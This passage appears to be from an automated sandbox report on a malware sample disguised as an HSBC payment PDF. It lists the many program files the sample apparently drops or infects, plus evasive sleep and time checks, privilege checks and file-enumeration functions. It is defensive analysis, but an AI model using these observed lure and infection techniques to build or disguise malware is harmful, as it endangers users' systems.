              Source: C:\Windows\SysWOW64\perfhost.exe Window / User API: threadDelayed 7782
              Source: C:\Windows\SysWOW64\perfhost.exe Window / User API: threadDelayed 2216
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Dropped PE file which has not been started: C:\Windows\System32\AppVClient.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-181667)
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\perfhost.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\Spectrum.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_0-183332)
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | API coverage: 5.2 %
Source: C:\Windows\SysWOW64\perfhost.exe | API coverage: 1.7 %
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe TID: 3040 | Thread sleep time: -150000s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 7688 | Thread sleep count: 483 > 30
Source: C:\Windows\System32\msdtc.exe TID: 7688 | Thread sleep time: -48300s >= -30000s
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7852 | Thread sleep count: 7782 > 30
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7852 | Thread sleep time: -77820000s >= -30000s
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7852 | Thread sleep count: 2216 > 30
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7852 | Thread sleep time: -22160000s >= -30000s
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
